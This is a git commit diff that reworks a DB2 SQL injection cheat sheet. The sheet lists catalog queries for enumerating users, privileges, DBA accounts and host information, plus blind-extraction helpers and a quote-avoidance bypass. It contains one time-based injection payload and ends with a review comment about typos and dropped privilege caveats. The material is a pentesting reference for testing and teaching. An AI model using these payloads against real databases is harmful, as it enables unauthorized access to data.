DB2 Injection updates

Swissky 2024-11-17 18:37:07 +01:00
parent 3c5bab0338
commit b98f8ca587


@ -5,203 +5,127 @@
## Summary ## Summary
* [DB2 Cheatsheet](#db2-cheatsheet) * [DB2 Comments](#db2-comments)
* [DB2 Default Databases](#db2-default-databases)
* [DB2 Enumeration](#db2-enumeration)
* [DB2 Methodology](#db2-methodology)
* [DB2 Error Based](#db2-error-based)
* [DB2 Blind Based](#db2-blind-based)
* [DB2 Time Based](#db2-time-based)
* [DB2 WAF Bypass](#db2-waf-bypass)
* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
* [References](#references) * [References](#references)
## DB2 Cheatsheet ## DB2 Comments
### Version | Type | Description |
| -------------------------- | --------------------------------- |
| `--` | SQL comment |
## DB2 Default Databases
| Name | Description |
| ----------- | --------------------------------------------------------------------- |
| SYSIBM | Core system catalog tables storing metadata for database objects. |
| SYSCAT | User-friendly views for accessing metadata in the SYSIBM tables. |
| SYSSTAT | Statistics tables used by the DB2 optimizer for query optimization. |
| SYSPUBLIC | Metadata about objects available to all users (granted to PUBLIC). |
| SYSIBMADM | Administrative views for monitoring and managing the database system. |
| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
## DB2 Enumeration
| Description | SQL Query |
| ---------------- | ----------------------------------------- |
| DBMS version | `select versionnumber, version_timestamp from sysibm.sysversions;` |
| DBMS version | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
| DBMS version | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
| DBMS version | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
| DBMS version | `select service_level,bld_level from sysibmadm.env_inst_info` |
| Current user | `select user from sysibm.sysdummy1` |
| Current user | `select session_user from sysibm.sysdummy1` |
| Current user | `select system_user from sysibm.sysdummy1` |
| Current database | `select current server from sysibm.sysdummy1` |
| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
## DB2 Methodology
| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
| List databases | `SELECT schemaname FROM syscat.schemata;` |
| List columns | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
| List tables | `SELECT table_name FROM sysibm.tables` |
| List tables | `SELECT name FROM sysibm.systables` |
| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
## DB2 Error Based
```sql ```sql
select versionnumber, version_timestamp from sysibm.sysversions; -- Returns all in one xml-formatted string
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo select xmlagg(xmlrow(table_schema)) from sysibm.tables
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
select service_level,bld_level from sysibmadm.env_inst_info
```
### Comments -- Same but without repeated elements
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
```sql -- Returns all in one xml-formatted string.
select blah from foo -- comment like this (double dash) -- May need CAST(xml2clob(… AS varchar(500)) to display the result.
``` select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
### Current User
```sql
select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1
```
### List Users
DB2 uses OS accounts
```sql
select distinct(authid) from sysibmadm.privileges -- priv required
select grantee from syscat.dbauth -- incomplete results
select distinct(definer) from syscat.schemata -- more accurate
select distinct(grantee) from sysibm.systabauth -- same as previous
```
### List Privileges
```sql
select * from syscat.tabauth -- shows priv on tables
select * from syscat.tabauth where grantee = current user -- shows privs for current user
select * from syscat.dbauth where grantee = current user;;
select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
```
### List DBA Accounts
```sql
select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = Y or SYSADMAUTH = G
```
### Current Database
```sql
select current server from sysibm.sysdummy1
```
### List Databases
```sql
select distinct(table_catalog) from sysibm.tables
SELECT schemaname FROM syscat.schemata;
```
### List Columns
```sql
select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
```
### List Tables
```sql
select table_name from sysibm.tables
select name from sysibm.systables
```
### Find Tables From Column Name
```sql
select tbname from sysibm.syscolumns where name='username'
```
### Select Nth Row
```sql
select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
```
### Select Nth Char
```sql
select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
```
### Bitwise AND/OR/NOT/XOR
```sql
select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
```
### ASCII Value
```sql
Char select chr(65) from sysibm.sysdummy1 -- returns 'A'
```
### Char -> ASCII Value
```sql
select ascii('A') from sysibm.sysdummy1 -- returns 65
```
### Casting
```sql
select cast('123' as integer) from sysibm.sysdummy1
select cast(1 as char) from sysibm.sysdummy1
```
### String Concat
```sql
select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
``` ```
### IF Statement ## DB2 Blind Based
Seems only allowed in stored procedures. Use case logic instead.
### Case Statement | Description | SQL Query |
| ---------------- | ------------------------------------------ |
```sql | Substring | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1 | ASCII value | `select chr(65) from sysibm.sysdummy1` |
``` | CHAR to ASCII | `select ascii('A') from sysibm.sysdummy1` |
| Select Nth Row | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
| Bitwise AND | `select bitand(1,0) from sysibm.sysdummy1` |
| Bitwise AND NOT | `select bitandnot(1,0) from sysibm.sysdummy1` |
| Bitwise OR | `select bitor(1,0) from sysibm.sysdummy1` |
| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` |
| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` |
### Avoiding Quotes ## DB2 Time Based
```sql Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
```
### Time Delay
Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
```sql ```sql
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 ' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
``` ```
### Serialize to XML (for error based)
## DB2 WAF Bypass
### Avoiding Quotes
```sql ```sql
select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
``` ```
### Command Execution and Local File Access
Seems it's only allowed from procedures or UDFs. ## DB2 Accounts and Privileges
### Hostname/IP and OS INFO | Description | SQL Query |
| ---------------- | ------------------------------------ |
```sql | List users | `select distinct(grantee) from sysibm.systabauth` |
select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv | List users | `select distinct(definer) from syscat.schemata` |
``` | List users | `select distinct(authid) from sysibmadm.privileges` |
| List users | `select grantee from syscat.dbauth` |
### Location of DB Files | List privileges | `select * from syscat.tabauth` |
| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
```sql | List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv | List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
``` | Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
### System Config
```sql
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
```
### Default System Database
* SYSIBM
* SYSCAT
* SYSSTAT
* SYSPUBLIC
* SYSIBMADM
* SYSTOOLs
## References ## References
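Review bot: the "List privileges" row of the new DB2 Accounts and Privileges table puts a description inside the backticked query cell, `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies`, using an em-dash rather than the `--` token that the new DB2 Comments table itself documents, so the cell is not a runnable query; move the description into the Description column and correct the spelling to "privileges". The Error Based block also carries over the misspelled function name in `select xml2clob(xmelement(name t, table_schema)) from sysibm.tables`; the Db2 function is `xmlelement`. The rewrite drops two caveats the old sections had: `sysibmadm.env_sys_info` (now the "OS info" enumeration row) and `sysibmadm.reg_variables where reg_var_name='DB2PATH'` (now "Location of DB files") were both annotated `-- requires priv`, and the new rows say nothing about the privilege requirement, which matters for a reader deciding what to expect from a low-privilege account; the Time Based section likewise loses the sentence explaining that the response is faster when the condition is false, which is the half of the explanation that makes the technique measurable. Finally, the `SYSTOOLs` entry in the Default Databases table should be `SYSTOOLS`, matching the casing of the other schema names in the same column.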